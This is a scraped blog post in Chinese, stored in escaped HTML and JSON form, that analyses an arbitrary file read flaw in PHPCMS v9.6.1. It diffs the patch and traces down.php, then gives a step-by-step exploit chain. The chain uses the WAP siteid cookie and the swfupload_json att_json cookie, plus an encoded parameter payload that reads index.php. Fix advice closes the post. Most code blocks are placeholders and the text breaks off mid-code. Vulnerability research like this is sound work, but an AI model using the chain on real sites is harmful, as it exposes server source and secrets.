![\"\u8bb2\u89e3PHPCMSv9.6.1\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e\u7684\u6316\u6398\u548c\u5206\u6790\u8fc7\u7a0b\u63d2\u56fe\"](\"https:\/\/img.php.cn\/upload\/article\/000\/000\/052\/5fd8807224734604.jpg\" "\\"\u8bb2\u89e3PHPCMSv9.6.1\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e\u7684\u6316\u6398\u548c\u5206\u6790\u8fc7\u7a0b\u63d2\u56fe\\"")
<\/p>\n<\/p>\n
\u63a8\u8350\uff08\u514d\u8d39\uff09\uff1a<\/p>\n
\u770b\u5230\u7f51\u4e0a\u8bf4\u51fa\u4e86\u8fd9\u4e48\u4e00\u4e2a\u6f0f\u6d1e\uff0c\u6240\u4ee5\u62bd\u7a7a\u5206\u6790\u4e86\u4e0b\uff0c\u5f97\u51fa\u672c\u7bc7\u5206\u6790\u3002<\/p>\n
\u8fd9\u91cc\u628a\u672c\u6b21\u5206\u6790\u4e2d\u9700\u8981\u638c\u63e1\u7684\u77e5\u8bc6\u68b3\u7406\u4e86\u4e0b\uff1a<\/p>\n
php\u539f\u751fparse_str\u65b9\u6cd5\uff0c\u4f1a\u81ea\u52a8\u8fdb\u884c\u4e00\u6b21urldecode\uff0c\u7b2c\u4e8c\u4e2a\u53c2\u6570\u4e3a\u7a7a\uff0c\u5219\u6267\u884c\u7c7b\u4f3cextract\u64cd\u4f5c\u3002<\/p>\n
\u7acb\u5373\u5b66\u4e60<\/span>\u201c\u201d\uff1b<\/p>\n<\/li>\n \u539f\u751fempty\u65b9\u6cd5\uff0c\u5bf9\u5b57\u7b26\u4e32””\u8fd4\u56detrue\u3002<\/p>\n<\/li>\n phpcms\u4e2dsys_auth\u662f\u5bf9\u79f0\u52a0\u5bc6\u4e14\u5728\u4e0d\u77e5\u9053auth_key\u7684\u60c5\u51b5\u4e0b\u7406\u8bba\u4e0a\u4e0d\u53ef\u80fd\u6784\u9020\u51fa\u6709\u6548\u5bc6\u6587\u3002<\/p>\n<\/li>\n<\/ol>\n \u5148diff\u4e0bv9.6.0\u548cv9.6.1,\u53d1\u73b0phpcms\/modules\/content\/down.php\u4e2d\u6709\u5982\u4e0b\u4fee\u6539\uff1a<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u4e3b\u8981\u4fee\u6539\u4e86\u4e24\u4e2a\u65b9\u6cd5init()\u548cdownload()\uff0c\u5927\u80c6\u7684\u731c\u60f3\u4f30\u8ba1\u662f\u8fd9\u4e24\u4e2a\u51fd\u6570\u51fa\u95ee\u9898\u4e86\u3002<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n safe_replace\u51fd\u6570\u5982\u4e0b<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n init\u65b9\u6cd5\u4e2d\u6839\u636e\u539f\u59cb\u7684$a_k(\u5305\u542b\u4e86file_down\u7684\u6587\u4ef6\u7684\u57fa\u672c\u4fe1\u606f),\u8fdb\u884c\u4e00\u6b21\u9a8c\u8bc1\uff0c\u5e76\u4e14\u751f\u6210\uff0c\u8c03\u7528<\/p>\n<\/li>\n<\/ol>\n download\u65b9\u6cd5\u7684url\uff0curl\u7684schema\u4e3a$downurl=’?m=content&c=down&a=download&a_k=’.$a_k(\u5fc5\u987b\u7b26\u5408\u4e00\u5b9a\u6761\u4ef6\u3002)<\/p>\n download\u65b9\u6cd5\u63a5\u6536\u5230$a_k\uff0c\u8fdb\u884c\u89e3\u7801\uff0c\u89e3\u51fa\u6587\u4ef6\u4fe1\u606f\uff0c\u8c03\u7528file_down($fileurl, $filename)( \u5fc5\u987b\u7b26\u5408\u4e00\u5b9a\u6761\u4ef6)<\/p>\n<\/li>\n<\/ol>\n \u6211\u4eec\u6765\u770b\u4e0bfile_down\u51fd\u6570,\u7b2c\u4e00\u4e2a\u53c2\u6570$filepath,\u624d\u662f\u5b9e\u9645\u63a7\u5236readfile\u7684\u6587\u4ef6\u540d\u7684\u53d8\u91cf,readfile\u53ef\u4ee5\u8bfb\u53d6\u672c\u5730\u6587\u4ef6\uff0c\u6240\u4ee5\u6211\u4eec\u6784\u9020\u7b26\u5408\u6761\u4ef6\u7684$fileurl\u7ed5\u8fc7\u4e0a\u8ff0\u7684\u9650\u5236\u5c31\u53ef\u4ee5\u5b8c\u6210\u672c\u5730\u6587\u4ef6\u7684\u8bfb\u53d6\u529f\u80fd\uff01<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u5982\u679c\u6211\u4eec\u8981\u8bfb\u53d6\u7ad9\u70b9\u7684.php\u7ed3\u5c3e\u6587\u4ef6\uff0c\u7531\u4e8e\u6709\u5173\u952e\u70b911\u5b58\u5728,$fileurl\u4e2d\u4e0d\u80fd\u51fa\u73b0php\uff0c\u4e0d\u8fc7\u4ece\u5173\u952e\u70b917\u53ef\u4ee5\u770b\u5230\u8fdb\u884c\u4e86\u66ff\u6362<\/p>\n \u767b\u5f55\u540e\u590d\u5236 \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u90a3\u4e48\u53ef\u4ee5\u60f3\u5230\u6211\u4eec\u6784\u9020\u51fa\u7b26\u5408.ph([]+)p\u7684\u6587\u4ef6\u540e\u7f00\uff0c\u6700\u540e\u4f1a\u88ab\u66ff\u6362\u6210.php\u3002\u800c\u4e14\u8fd9\u53e5\u8bdd\u662f9.6.1\u65b0\u589e\u7684\uff0c\u66f4\u52a0\u786e\u5b9a\u4e86\uff0c\u8fd9\u4e2a\u6f0f\u6d1e\u662f9.6.1\u7279\u6709\u7684\u3002<\/p>\n \u518d\u5411\u4e0a\u4e0a\u770b<\/p>\n \u767b\u5f55\u540e\u590d\u5236 \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u53d8\u91cf$m\u4e3a\u771f\uff0c\u90a3\u4e48\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u5f15\u5165\u53d8\u91cf$s\u6765\u6784\u9020$fileurl\uff0c\u4e14$fileurl\u7531\u53d8\u91cf$f\u63a7\u5236\u3002<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u901a\u8fc7parse_str\u6765extract\u53d8\u91cf\uff0c\u5f88\u5bb9\u6613\u7684\u5f97\u51fa\u63a7\u5236$i,$m,$f,$t,$s,$d,$modelid\u53d8\u91cf,\u770b\u5230\u8fd9\u91cc\u6211\u4eec\u53ef\u4ee5\u6784\u9020$a_k\u6765\u63a7\u5236\u8fd9\u4e9b\u53d8\u91cf\u3002<\/p>\n \u518d\u5411\u4e0a\u770b<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u8fd9\u4e2a\u5173\u952e\u70b96\u5f88\u91cd\u8981\uff0c\u56e0\u4e3a\u8fd9\u91cc\u7684$pc_auth_key\u51e0\u4e4e\u662f\u4e0d\u53ef\u80fd\u66b4\u529b\u51fa\u6765\u7684\uff0c\u7136\u800c\u5f97\u5230\u8fd9\u4e2a\u52a0\u5bc6\u7684$a_k\u53ea\u6709\u5728init()\u65b9\u6cd5\u4e2d\u4f7f\u7528\u4e86\u76f8\u540c\u7684$pc_auth_key\u3002\u6240\u4ee5\u6211\u4eec\u53ea\u80fd\u901a\u8fc7init()\u65b9\u6cd5\u6765\u6784\u9020$a_k\u3002<\/p>\n \u6211\u4eec\u73b0\u5728\u6765\u770b\u4e0binit\u65b9\u6cd5<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u8fd9\u91cc\u53ef\u4ee5\u53d1\u73b0sys_auth\u7684auth\u7adf\u7136\u662f\u4f7f\u7528\u7cfb\u7edf\u9ed8\u8ba4\u7684auth_key\uff0c\u76f4\u89c9\u544a\u8bc9\u6211\u53ef\u80fd\u95ee\u9898\u51fa\u5728\u8fd9\u91cc\u4e86\uff0c\u9664\u4e86\u8fd9\u4e2a\u533a\u522b\uff0cinit\u65b9\u6cd5\u522b\u7684\u903b\u8f91\u5c31\u4e0d\u518d\u8d58\u8ff0\u3002<\/p>\n \u603b\u7ed3\u4e00\u4e0b:<\/p>\n index.php?m=content&c=down&a=init&a_k=\u60f3\u529e\u6cd5\u6784\u9020\u51fa\u7b26\u5408\u6761\u4ef6\u7684\u3002<\/p>\n \u7136\u540einit\u65b9\u6cd5\u4f1a\u6784\u9020\u51fa\u7b26\u5408download\u65b9\u6cd5\u4e2d\u80fd\u591f\u89e3\u5bc6\u7684$a_k\u3002<\/p>\n \u901a\u8fc7\u5bf9$a_k\u8fdb\u884c\u63a7\u5236\uff0c\u95f4\u63a5\u63a7\u5236$i,$f,$m,$s,$d\u7b49\u53d8\u91cf\u5b8c\u6210\u6f0f\u6d1e\u7684\u5229\u7528\u3002<\/p>\n \u5bf9\u6e90\u7801\u8fdb\u884c\u5feb\u901f\u626b\u63cf\uff0c\u770b\u770b\u54ea\u4e9b\u5730\u65b9\u80fd\u591f\u751f\u4ea7\u5bf9init\u65b9\u6cd5\u7684\u8c03\u7528\uff0c\u5176\u5b9e\u5c31\u662f\u5e38\u89c4\u7684\u4e0b\u8f7d\u6a21\u578b\u7684\u903b\u8f91\u3002<\/p>\n phpcms\/modules\/content\/fields\/downfile\u548cphpcms\/modules\/content\/fields\/downfiles\u4e2d\u4f1a\u751f\u6210init\u65b9\u6cd5\u7684$a_k<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u4f46\u662f\u5206\u6790\u53d1\u73b0\uff0ccontent_input\u548ccontent_output\u903b\u8f91\u4e2d\u6743\u9650\u9a8c\u8bc1\u548c\u9650\u5236\u903b\u8f91\u6bd4\u8f83\u5b8c\u5584\uff0c\u57fa\u672c\u4e0d\u5b58\u5728\u5229\u7528\u53ef\u80fd\u3002<\/p>\n \u7531\u4e8e\u662fsys_auth\u662f\u5bf9\u79f0\u52a0\u5bc6\uff0c\u90a3\u4e48\u80fd\u4e0d\u80fd\u627e\u4e2a\u4f7f\u7528\u76f8\u540c\u5bc6\u94a5\u751f\u6210\u7684\u5730\u65b9\u6765\u751f\u6210\uff0c\u5bf9sys_auth\u8fdb\u884c\u5168\u6587\u641c\u7d22\uff0c\u6211\u4eec\u627e\u627e\u6709\u6ca1\u6709\u7b26\u5408\u4e0b\u5217\u6761\u4ef6\u7684\u4e0a\u4e0b\u6587<\/p>\n \u65b9\u5f0f\u662fENCODE<\/p>\n<\/li>\n Auth_key\u662f\u7cfb\u7edf\u9ed8\u8ba4\u7684\u5373\uff1apc_base::load_config(‘system’,’auth_key’)<\/p>\n<\/li>\n \u4e14\u5f85\u52a0\u5bc6\u5185\u5bb9\u662f\u53ef\u63a7\u7684(\u53ef\u4ee5\u662f\u6211\u4eec$_REQUEST\u7684\u6570\u636e\uff0c\u6216\u8005\u53ef\u4ee5\u6784\u9020\u7684)<\/p>\n<\/li>\n \u52a0\u5bc6\u540e\u7684\u6570\u636e\u6709\u56de\u663e\u7684\u3002<\/p>\n<\/li>\n<\/ol>\n \u5171\u627e\u523058\u4e2a\u5339\u914d\u9879\uff0c\u4f46\u662f\u6ca1\u6709\u7b26\u5408\u4e0a\u4e0b\u6587\u7684\uff0c\u4e0d\u8fc7\u6211\u4eec\u53ef\u4ee5\u6ce8\u610f\u5230<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n param::set_cookie param::get_cookie \u5bf9cookie\u52a0\u5bc6\u662f\u4f7f\u7528\u9ed8\u8ba4\u7684auth_key\u7684\u3002<\/p>\n \u9a6c\u4e0a\u5bf9set_cookie\u8fdb\u884c\u5168\u6587\u641c\u7d22\uff0c\u5e76\u4e14\u67e5\u627e\u7b26\u5408\u4e0b\u5217\u6761\u4ef6\u7684\u4e0a\u4e0b\u6587\u3002<\/p>\n set_cookie\u7684\u5185\u5bb9\u662f\u53ef\u63a7\u7684\u3002<\/p>\n<\/li>\n set_cookie\u7684\u89e6\u53d1\u6761\u4ef6\u5c3d\u53ef\u80fd\u7684\u9650\u5236\u5c0f\u3002<\/p>\n<\/li>\n<\/ol>\n \u4e00\u5171\u627e\u5230122\u4e2a\u5339\u914d\u9879\uff0c\u627e\u5230\u4e86\u4e24\u4e2a\u6bd4\u8f83\u597d\u7684\u89e6\u53d1\u70b9\u3002<\/p>\n phpcms\/moduels\/attachment\/attachments.php\u4e2d\u7684swfupload_json\/swfupload_del\u65b9\u6cd5\u548cphpcms\/modules\/video\/video.php\u4e2d\u7684swfupload_json\/del\u65b9\u6cd5<\/p>\n video\u6a21\u5757\u9700\u8981\u7ba1\u7406\u5458\u6743\u9650\uff0c\u5c31\u4e0d\u8003\u8651\u4e86,attachment\u6a21\u5757\u53ea\u8981\u662f\u6ce8\u518c\u7528\u6237\u5373\u53ef\u8c03\u7528\u3002<\/p>\n \u6211\u4eec\u6765\u770b\u4e0bswfupload_json<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u6211\u4eec\u53ef\u4ee5\u901a\u8fc7src\u548cfilename\u6765\u6784\u9020\uff0c\u6700\u7ec8\u6211\u9009\u7684\u662fsrc\uff0c\u6700\u7ec8\u5f62\u5f0f\u4f1a\u662f\u4e00\u4e2ajson\u4e32\uff0c\u5f53\u7136\u6709\u591a\u4e2a\u4f1a\u4ee5”||”\u5206\u5272\u3002<\/p>\n \u6211\u4eec\u6ce8\u518c\u4e2a\u7528\u6237\u767b\u5f55\u4e4b\u540e\uff0c\u8c03\u7528<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u4ea7\u751f\u7684\u6570\u636e\u4f1a\u662f<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u7136\u540e\u6211\u4eec\u5f97\u5230response.header\u4e2d\u7684set-cookie [“att_json”]\u3002<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u6211\u4eec\u4fee\u6539\u4e0bdown.php->init\u65b9\u6cd5,\u628aDECODE\u4e4b\u540e\u7684$a_k\u8f93\u51fa\u6765\u3002<\/p>\n \u7136\u540e\u6211\u4eec\u8c03\u7528<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u6fc0\u52a8\u4eba\u5fc3,init\u65b9\u6cd5\u6210\u529fDECODE\u4e86$a_k<\/p>\n \u597d\u4e86\u76ee\u524d\u9a8c\u8bc1\u4e86\u6211\u4eec\u7684\u60f3\u6cd5\u53ef\u884c\uff0c\u63a5\u4e0b\u6765\u5e94\u8be5\u6784\u9020\u53ef\u7528\u7684payload\u4e86\u3002<\/p>\n \u76ee\u524d\u8981\u89e3\u51b3\u7684\u5c31\u662f \u4ecejson\u4e2dparse_str\u5e76\u4e14\u80fd\u591f\u89e3\u6790\u51fa$i,$m,$f\u7b49\u53d8\u91cf\u3002<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u89e3\u6790{“aid”:888,”src”:”fobnn=q \u548cp1=12312″,”filename”:””}<\/p>\n \u8bf4\u660eparse_str\u8fd8\u662f\u89e3\u6790\u8fd8\u662f\u53ef\u4ee5\u5b9e\u73b0\u7684\uff0c\u524d\u540e\u95ed\u5408\u4e00\u4e0b\uff0c\u4e2d\u95f4\u586b\u5145\u6211\u4eec\u9700\u8981\u7684\u53d8\u91cf\u5373\u53ef\uff0c\u4f8b\u5982<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u90a3\u4e48fobnn\u548cp1\u5c31\u662f\u6b63\u5e38\u89e3\u6790\u7684\uff0csrc\u9700\u8981URLENCODE\u63d0\u4ea4\uff0c\u8fd9\u6837\u4e0d\u4f1a\u5bfc\u81f4php\u89e3\u6790\u9519\u8bef\u3002<\/p>\n \u6211\u4eec\u5148\u6784\u9020\u4e00\u4e2a\u7b26\u5408init\u65b9\u6cd5\u7684$a_k\u4f7f\u5f97\u80fd\u5b8c\u6210\u6b63\u5e38\u7684\u6d41\u7a0b\u3002<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u6784\u9020pad=x&i=1&modelid=1&m=1&catid=1&f=fobnn&pade=\u7528\u6765\u6ee1\u8db3\u6761\u4ef6\u3002<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u5f97\u5230<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u7136\u540e\u63d0\u4ea4<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u6210\u529f\uff01\u9875\u9762\u5df2\u7ecf\u751f\u6210\u4e86\u8c03\u7528download\u65b9\u6cd5\u7684url<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u76ee\u524d\u6b63\u5e38\u6d41\u7a0b\u5df2\u7ecf\u8d70\u901a\uff0c\u628a\u76ee\u5149\u96c6\u4e2d\u5728\u5982\u4f55\u6784\u9020\u51fa\u7b26\u5408\u7684$fileurl\uff0c\u6765\u770b\u4e0binit\u65b9\u6cd5\u4e2d<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u5bf9f\u7684\u9650\u5236\u8fd8\u662f\u86ee\u591a\u7684\uff0c\u5305\u62ec\u5e38\u89c4\u9ed1\u540d\u5355\u68c0\u6d4bphp,asp\u7b49\u3002\u4e5f\u4e0d\u80fd\u51fa\u73b0”..”,”:”<\/p>\n \u8fd8\u597d\u6211\u4eec\u770b\u5230download\u51fd\u6570\u4e2d<\/p>\n \u767b\u5f55\u540e\u590d\u5236 \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u63a7\u5236$m\u5c31\u53ef\u4ee5\u901a\u8fc7$s\u6765\u6784\u9020\u4e86\uff0c\u800c$m\u548c$s\u53c2\u4e0e\u4e86$a_k\u7684\u6784\u9020\u3002<\/p>\n \u5728init\u65b9\u6cd5\u4e2d\u6211\u4eec\u53ef\u4ee5\u6784\u9020 m=1&s=.php&f=index \u7c7b\u4f3c\u7684\u6765\u7ed5\u8fc7init\u65b9\u6cd5\u7684\u68c0\u6d4b\uff0c\u6211\u4eec\u628a\u76ee\u5149\u805a\u7126\u5230download\u65b9\u6cd5\u3002<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u901a\u8fc7\u8fd9\u6837\u7684\u6784\u9020\u4e0a\u9762\u8fd9\u4e2a\u68c0\u6d4b\u80af\u5b9a\u53ef\u4ee5\u7ed5\u8fc7\uff0c\u4f46\u53d1\u73b0\u4e0b\u9762\u68c0\u6d4b\u5c31\u4f1a\u51fa\u95ee\u9898\uff0c\u6700\u540e$fileurl\u8fd8\u662f\u4f1a\u53d8\u6210index.php<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u597d\u5728\u5feb\u901f\u626b\u63cf\u4e2d\u770b\u5230\u7684<\/p>\n \u767b\u5f55\u540e\u590d\u5236 \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u53e6\u5916\u53c8\u770b\u5230<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u90a3\u4e48\u6784\u9020\u51fa d=1&m=1&f=.p <\/p>\n \u6700\u7ec8pad=x&i=1&modelid=1&catid=1&d=1&m=1&f=.p <\/p>\n \u7531\u4e8esafe_replce\u7684\u5b58\u5728\u6240\u4ee5<\/p>\n \u6240\u4ee5\u53ef\u4ee5\u6784\u9020<\/p>\n d=1&m=1&f=.p%3chp&s=index<\/p>\n \u6211\u4eec\u53d1\u73b0\u5728init\u65b9\u6cd5\u4e2d\u4f1asafe_replace\u4e00\u6b21\uff0c\u548cparse_str\u4e00\u6b21\u3002<\/p>\n \u90a3\u4e48\u6700\u7ec8\u7f16\u7801\u5230download $a_k\u4e2d\u7684\u6570\u636e\u5b9e\u9645\u8fd8\u662f<\/p>\n \u6240\u4ee5\u6211\u4eec\u8981\u786e\u4fdd\u5728init\u65b9\u6cd5\u7f16\u7801\u7684\u65f6\u5019\u662f%3c\u5373\u53ef\uff0c\u5bf9%3c\u8fdb\u884c\u4e00\u6b21urlencode\uff0c\u6784\u9020<\/p>\n d=1&m=1&f=.p%253chp&s=index<\/p>\n \u5f53\u7136\u8981\u8bfb\u53d6\u522b\u7684\u76ee\u5f55\u7684\uff0c\u90a3\u540c\u6837\u5bf9\u76ee\u5f55\u8def\u5f84\u8fdb\u884c\u7f16\u7801\u3002<\/p>\n \u4ee5\u8bfb\u53d6\u9996\u9875index.php\u4e3a\u4f8b<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u6700\u7ec8\u63d0\u793a\u4e0b\u8f7d\u6587\u4ef6\uff0c\u6587\u4ef6\u4e0b\u8f7d\u6210\u529f\uff0c\u6253\u5f00\u6765\u770b\u786e\u5b9e\u662findex.php\u5185\u5bb9\u3002<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u53ef\u4ee5\u53d1\u73b0<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u53ef\u63a7\u5236$this->userid\u4e14\u6ca1\u6709\u590d\u6742\u7684\u6743\u9650\u6821\u9a8c\uff0c\u800c\u4e14\u53c8\u662f\u9ed8\u8ba4AUTH_KEY\u52a0\u5bc6\u7684\u3002<\/p>\n \u5168\u6587\u627e\u4e0b\u65e0\u9650\u5236\u53ef\u4ee5set_cookie\u7684\uff0c\u53d1\u73b0WAP\u6a21\u5757\u53ef\u4ee5\u5229\u7528<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/p>\n \u6ca1\u6709\u4efb\u4f55\u6761\u4ef6\u9650\u5236\u6211\u4eec\u53ef\u4ee5$_GET[‘siteid’]\u6765\u63a7\u5236param::set_cookie(‘siteid’,$this->siteid)\uff0c\u4e14\u9ed8\u8ba4\u90fd\u6709WAP\u6a21\u5757\u7684\u6587\u4ef6\uff0c\u4f46\u4e0d\u9700\u8981\u5f00\u542f\u3002<\/p>\n \u6d41\u7a0b\u5982\u4e0b:<\/p>\n index.php?m=wap&c=index&siteid=1 \u83b7\u53d6\u540d\u79f0\u4e3asiteid\u7684cookie\u3002<\/p>\n<\/li>\n \u8bbf\u95eeindex.php?m=attachment&c=attachments&a=swfupload_json&aid=1<\/p>\n \u767b\u5f55\u540e\u590d\u5236 <\/li>\n<\/ol>\n \u54cd\u5e94\u6210\u529f\u4e4b\u540e\uff0c\u83b7\u53d6\u540d\u79f0\u4e3aatt_json\u7684cookie<\/p>\n \u8bbf\u95eeindex.php?m=content&c=down&a=init&a_k=\u83b7\u53d6\u5230\u7684att_json\uff0c\u6765\u6784\u9020\u6700\u7ec8\u6f0f\u6d1e\u5229\u7528\u8def\u5f84\uff0c<\/p>\n<\/li>\n<\/ol>\n \u53ef\u4ee5\u76f4\u63a5\u622a\u53d6\u751f\u6210\u7684$a_k<\/p>\n \u8bbf\u95eeindex.php?m=content&c=download&a=init&a_k=\u622a\u53d6\u7684$a_k.\u5b8c\u6210\u5229\u7528\u3002<\/p>\n<\/li>\n<\/ol>\n init\u65b9\u6cd5\u4e2d\u7684$a_k \u52a0\u89e3\u5bc6sys_auth\u4e0d\u8981\u91c7\u7528\u9ed8\u8ba4\u5bc6\u94a5\u3002<\/p>\n file_down\u4e4b\u524d\u5bf9$fileurl\u518d\u505a\u4e00\u6b21\u8fc7\u6ee4\u3002<\/p>\n<\/p>\n \u4ee5\u4e0a\u5c31\u662f\u8bb2\u89e3PHPCMSv9.6.1\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e\u7684\u6316\u6398\u548c\u5206\u6790\u8fc7\u7a0b\u7684\u8be6\u7ec6\u5185\u5bb9\uff0c\u66f4\u591a\u8bf7\u5173\u6ce8\u7c73\u4e91\u5176\u5b83\u76f8\u5173\u6587\u7ae0\uff01<\/p>\n","protected":false},"excerpt":{"rendered":" \u4ecb\u7ecdPHPCMSv9.6.1\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e\u7684\u6316\u6398 \u63a8\u8350\uff08\u514d\u8d39\uff09\uff1a \u770b\u5230\u7f51\u4e0a\u8bf4\u51fa\u4e86\u8fd9\u4e48\u4e00\u4e2a\u6f0f\u6d1e\uff0c\u6240\u4ee5\u62bd\u7a7a\u5206\u6790\u4e86\u4e0b\uff0c\u5f97\u51fa\u672c\u7bc7\u5206\u6790\u3002 1.\u51c6\u5907\u5de5\u4f5c&\u6f0f\u6d1e\u5173\u952e\u70b9\u5feb\u901f\u626b\u63cf 1.1\u524d\u7f6e\u77e5\u8bc6 \u8fd9\u91cc\u628a\u672c\u6b21\u5206\u6790\u4e2d\u9700\u8981\u638c\u63e1\u7684\u77e5\u8bc6\u68b3\u7406\u4e86\u4e0b\uff1a php\u539f\u751fparse_str\u65b9\u6cd5\uff0c\u4f1a\u81ea\u52a8\u8fdb\u884c\u4e00\u6b21urldecode\uff0c\u7b2c\u4e8c\u4e2a\u53c2\u6570\u4e3a\u7a7a\uff0c\u5219\u6267\u884c\u7c7b\u4f3cextract\u64cd\u4f5c\u3002 \u7acb\u5373\u5b66\u4e60\u201c\u201d\uff1b \u539f\u751fempty\u65b9\u6cd5\uff0c\u5bf9\u5b57\u7b26\u4e32””\u8fd4\u56detrue\u3002 phpcms\u4e2dsys_auth\u662f\u5bf9\u79f0\u52a0\u5bc6\u4e14\u5728\u4e0d\u77e5\u9053auth_key\u7684\u60c5\u51b5\u4e0b\u7406\u8bba\u4e0a\u4e0d\u53ef\u80fd\u6784\u9020\u51fa\u6709\u6548\u5bc6\u6587\u3002 1.2 \u5feb\u901f\u626b\u63cf \u5148diff\u4e0bv9.6.0\u548cv9.6.1,\u53d1\u73b0phpcms\/modules\/content\/down.php\u4e2d\u6709\u5982\u4e0b\u4fee\u6539\uff1a — a\/phpcms\/modules\/content\/down.php +++ b\/phpcms\/modules\/content\/down.php @@ -14,12 +14,16 @@ class down { $a_k = sys_auth($a_k, ‘DECODE’, pc_base::load_config(‘system’,’auth_key’)); if(empty($a_k)) showmessage(L(‘illegal_parameters’)); unset($i,$m,$f); + $a_k = safe_replace($a_k);^M parse_str($a_k); if(isset($i)) $i = $id = intval($i); if(!isset($m)) showmessage(L(‘illegal_parameters’)); if(!isset($modelid)||!isset($catid)) showmessage(L(‘illegal_parameters’)); if(empty($f)) showmessage(L(‘url_invalid’)); $allow_visitor = 1; + $id = […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[18],"tags":[],"class_list":["post-31850","post","type-post","status-publish","format-standard","hentry","category-cms"],"_links":{"self":[{"href":"https:\/\/fwq.ai\/blog\/wp-json\/wp\/v2\/posts\/31850","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fwq.ai\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fwq.ai\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fwq.ai\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fwq.ai\/blog\/wp-json\/wp\/v2\/comments?post=31850"}],"version-history":[{"count":0,"href":"https:\/\/fwq.ai\/blog\/wp-json\/wp\/v2\/posts\/31850\/revisions"}],"wp:attachment":[{"href":"https:\/\/fwq.ai\/blog\/wp-json\/wp\/v2\/media?parent=31850"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fwq.ai\/blog\/wp-json\/wp\/v2\/categories?post=31850"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fwq.ai\/blog\/wp-json\/wp\/v2\/tags?post=31850"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}1.2 \u5feb\u901f\u626b\u63cf<\/h3>\n
--- a\/phpcms\/modules\/content\/down.php\n+++ b\/phpcms\/modules\/content\/down.php\n@@ -14,12 +14,16 @@ class down {\n $a_k = sys_auth($a_k, 'DECODE', pc_base::load_config('system','auth_key'));\n if(empty($a_k)) showmessage(L('illegal_parameters'));\n unset($i,$m,$f);\n+ $a_k = safe_replace($a_k);^M\n parse_str($a_k);\n if(isset($i)) $i = $id = intval($i);\n if(!isset($m)) showmessage(L('illegal_parameters'));\n if(!isset($modelid)||!isset($catid)) showmessage(L('illegal_parameters'));\n if(empty($f)) showmessage(L('url_invalid'));\n $allow_visitor = 1;\n+ $id = intval($id);^M\n+ $modelid = intval($modelid);^M\n+ $catid = intval($catid);^M\n $MODEL = getcache('model','commons');\n $tablename = $this->db->table_name = $this->db->db_tablepre.$MODEL[$modelid]['tablename'];\n $this->db->table_name = $tablename.'_data';\n@@ -86,6 +90,7 @@ class down {\n $a_k = sys_auth($a_k, 'DECODE', $pc_auth_key);\n if(empty($a_k)) showmessage(L('illegal_parameters'));\n unset($i,$m,$f,$t,$ip);\n+ $a_k = safe_replace($a_k);^M\n parse_str($a_k); \n if(isset($i)) $downid = intval($i);\n if(!isset($m)) showmessage(L('illegal_parameters'));\n@@ -118,6 +123,7 @@ class down {\n }\n $ext = fileext($filename);\n $filename = date('Ymd_his').random(3).'.'.$ext;\n+ $fileurl = str_replace(array('<','>'), '',$fileurl);^M\n file_down($fileurl, $filename);\n }\n }<\/pre>\npublic function init() {\n $a_k = trim($_GET['a_k']);\n if(!isset($a_k)) showmessage(L('illegal_parameters'));\n $a_k = sys_auth($a_k, 'DECODE', pc_base::load_config('system','auth_key'));\/\/\u5173\u952e\u70b91\n if(empty($a_k)) 